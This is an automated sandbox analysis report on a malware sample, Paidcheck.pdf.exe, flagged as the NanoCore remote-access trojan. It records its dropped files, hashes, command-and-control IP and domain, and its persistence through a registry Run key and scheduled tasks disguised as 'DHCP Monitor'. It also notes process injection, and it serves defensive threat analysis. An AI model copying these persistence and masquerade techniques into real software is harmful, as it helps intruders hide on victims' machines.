      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion21/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection212Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 452385 Sample: Paidcheck.pdf.exe Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 16 other signatures 2->67 8 Paidcheck.pdf.exe 3 9 2->8         started        12 RegAsm.exe 2->12         started        14 dhcpmon.exe 2->14         started        16 dhcpmon.exe 2->16         started        process3 file4 49 C:\Users\user\AppData\...\explorerr.exe, PE32 8->49 dropped 51 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 8->51 dropped 53 C:\Users\...\explorerr.exe:Zone.Identifier, ASCII 8->53 dropped 57 2 other malicious files 8->57 dropped 73 Creates an undocumented autostart registry key 8->73 75 Writes to foreign memory regions 8->75 77 Injects a PE file into a foreign processes 8->77 18 RegAsm.exe 1 15 8->18         started        23 wscript.exe 1 8->23         started        55 C:\Users\user\AppData\...\RegAsm.exe.log, ASCII 12->55 dropped 25 conhost.exe 12->25         started        27 conhost.exe 14->27         started        29 conhost.exe 16->29         started        signatures5 process6 dnsIp7 59 217.138.212.57, 2018, 49704 M247GB United Kingdom 18->59 43 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 18->43 dropped 45 C:\Users\user\AppData\Local\...\tmp4FE3.tmp, XML 18->45 dropped 47 C:\Program Files (x86)\...\dhcpmon.exe, PE32 18->47 dropped 69 Uses schtasks.exe or at.exe to add and modify task schedules 18->69 31 schtasks.exe 18->31         started        33 schtasks.exe 18->33         started        71 Wscript starts Powershell (via cmd or directly) 23->71 35 powershell.exe 25 23->35         started        file8 signatures9 process10 process11 37 conhost.exe 31->37         started        39 conhost.exe 33->39         started        41 conhost.exe 35->41         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Paidcheck.pdf.exe100%AviraHEUR/AGEN.1118541
      Paidcheck.pdf.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe100%AviraHEUR/AGEN.1118541
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe100%Joe Sandbox ML
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%VirustotalBrowse
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\RegAsm.exe0%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe33%ReversingLabsByteCode-MSIL.Backdoor.NanoBot

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      10.2.RegAsm.exe.5f60000.23.unpack100%AviraTR/NanoCore.fadteDownload File
      10.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      217.138.212.571%VirustotalBrowse
      217.138.212.570%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microso0%URL Reputationsafe
      http://crl.microsofX0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://crl.micr0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      annapro.linkpc.netfalse
        		high
        217.138.212.57true
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.apache.org/licenses/LICENSE-2.0Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
          		high
          http://www.fontbureau.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
            		high
            http://www.fontbureau.com/designersGPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
              		high
              http://www.fontbureau.com/designers/?Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                		high
                http://www.founder.com.cn/cn/bThePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers?Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                  		high
                  https://go.micropowershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.tiro.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                    		high
                    http://www.goodfont.co.krPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://google.comRegAsm.exe, 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmpfalse
                      		high
                      http://www.carterandcone.comlPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.sajatypeworks.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.typography.netDPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers/cabarga.htmlNPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        		high
                        http://www.founder.com.cn/cn/cThePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.galapagosdesign.com/staff/dennis.htmPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://fontfabrik.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/frere-jones.htmlPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.microsoRegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.microsofXRegAsm.exe, 0000000A.00000002.479021599.0000000000EC2000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/DPleasePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers8Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fonts.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              		high
                              http://www.sandoll.co.krPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.deDPleasePaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.zhongyicts.com.cnPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://crl.micrpowershell.exe, 0000000B.00000003.376733884.0000000009675000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePaidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmpfalse
                                		high
                                http://www.sakkal.comPaidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                217.138.212.57
                                		unknownUnited Kingdom
                                		9009M247GBtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:452385
                                Start date:22.07.2021
                                Start time:09:32:06
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 12m 44s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:Paidcheck.pdf.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@20/24@0/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 13.2% (good quality ratio 11.2%)
                                • Quality average: 63.3%
                                • Quality standard deviation: 27.4%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 101
                                • Number of non-executed functions: 6
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                09:32:57API Interceptor1x Sleep call for process: Paidcheck.pdf.exe modified
                                09:33:48AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                09:33:50Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegAsm.exe" s>$(Arg0)
                                09:33:51Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
                                09:34:11API Interceptor32x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                217.138.212.57PO-110940,pdf.exeGet hashmaliciousBrowse

                                  Domains

                                  No context

                                  ASN

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  M247GBList_to_clear_62237.xlsmGet hashmaliciousBrowse
                                  • 5.61.62.219
                                  List_to_clear_62237.xlsmGet hashmaliciousBrowse
                                  • 5.61.62.219
                                  87597.exeGet hashmaliciousBrowse
                                  • 45.141.152.18
                                  NJrrXRv8zVGet hashmaliciousBrowse
                                  • 196.19.8.206
                                  DpuO7oic9y.exeGet hashmaliciousBrowse
                                  • 86.106.143.143
                                  download.dat.exeGet hashmaliciousBrowse
                                  • 194.187.251.163
                                  WindowsFormsApp1.exeGet hashmaliciousBrowse
                                  • 194.187.251.163
                                  file2.exeGet hashmaliciousBrowse
                                  • 141.98.102.243
                                  Anarchy_Client.exeGet hashmaliciousBrowse
                                  • 77.243.181.86
                                  2N9Nc0H82F.exeGet hashmaliciousBrowse
                                  • 37.120.206.86
                                  VsaTool.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  UpdateTool.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  KaseyaFix2.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  Update[1].exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  fpNebX354Y.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  fpNebX354Y.exeGet hashmaliciousBrowse
                                  • 185.156.172.76
                                  rz89FRwKvB.exeGet hashmaliciousBrowse
                                  • 172.94.109.9
                                  XH7Kdor28T.exeGet hashmaliciousBrowse
                                  • 185.144.82.239
                                  d7b.dllGet hashmaliciousBrowse
                                  • 81.92.202.190
                                  SecureMessageAtt.HTMLGet hashmaliciousBrowse
                                  • 45.141.152.18

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe02_extracted.exeGet hashmaliciousBrowse
                                    Payment Order_PDF.vbsGet hashmaliciousBrowse
                                      Quotation.exeGet hashmaliciousBrowse
                                        DhStRngAC2.exeGet hashmaliciousBrowse
                                          1.exeGet hashmaliciousBrowse
                                            Img 06 30 2021 4677.exeGet hashmaliciousBrowse
                                              Purchase#20880.pdf.exeGet hashmaliciousBrowse
                                                2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exeGet hashmaliciousBrowse
                                                  pVOLEckzk1.exeGet hashmaliciousBrowse
                                                    12ThYgKql3.exeGet hashmaliciousBrowse
                                                      Invoice NeededPDF.exeGet hashmaliciousBrowse
                                                        LKpLx8L8q9.exeGet hashmaliciousBrowse
                                                          3y4JNjrN1C.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exeGet hashmaliciousBrowse
                                                              kYvdP38gUv.exeGet hashmaliciousBrowse
                                                                qfjDTDPA9L.exeGet hashmaliciousBrowse
                                                                  wmaJOYGy7Q.exeGet hashmaliciousBrowse
                                                                    Trainer v22.3.exeGet hashmaliciousBrowse
                                                                      Trainer v 4.6.1.exeGet hashmaliciousBrowse
                                                                        PO 389293LC_pdf.exeGet hashmaliciousBrowse

                                                                          Created / dropped Files

                                                                          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: 02_extracted.exe, Detection: malicious, Browse
                                                                          • Filename: Payment Order_PDF.vbs, Detection: malicious, Browse
                                                                          • Filename: Quotation.exe, Detection: malicious, Browse
                                                                          • Filename: DhStRngAC2.exe, Detection: malicious, Browse
                                                                          • Filename: 1.exe, Detection: malicious, Browse
                                                                          • Filename: Img 06 30 2021 4677.exe, Detection: malicious, Browse
                                                                          • Filename: Purchase#20880.pdf.exe, Detection: malicious, Browse
                                                                          • Filename: 2216DAF252B5F3B4B00238A097E0DF2A57C20780DCE0F.exe, Detection: malicious, Browse
                                                                          • Filename: pVOLEckzk1.exe, Detection: malicious, Browse
                                                                          • Filename: 12ThYgKql3.exe, Detection: malicious, Browse
                                                                          • Filename: Invoice NeededPDF.exe, Detection: malicious, Browse
                                                                          • Filename: LKpLx8L8q9.exe, Detection: malicious, Browse
                                                                          • Filename: 3y4JNjrN1C.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.GenericKD.37108638.5946.exe, Detection: malicious, Browse
                                                                          • Filename: kYvdP38gUv.exe, Detection: malicious, Browse
                                                                          • Filename: qfjDTDPA9L.exe, Detection: malicious, Browse
                                                                          • Filename: wmaJOYGy7Q.exe, Detection: malicious, Browse
                                                                          • Filename: Trainer v22.3.exe, Detection: malicious, Browse
                                                                          • Filename: Trainer v 4.6.1.exe, Detection: malicious, Browse
                                                                          • Filename: PO 389293LC_pdf.exe, Detection: malicious, Browse
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Paidcheck.pdf.exe.log
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):1119
                                                                          Entropy (8bit):5.356708753875314
                                                                          Encrypted:false
                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                                          MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                                          SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                                          SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                                          SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:true
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):42
                                                                          Entropy (8bit):4.0050635535766075
                                                                          Encrypted:false
                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                          Malicious:false
                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):14734
                                                                          Entropy (8bit):4.993014478972177
                                                                          Encrypted:false
                                                                          SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                          MD5:8D5E194411E038C060288366D6766D3D
                                                                          SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                          SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
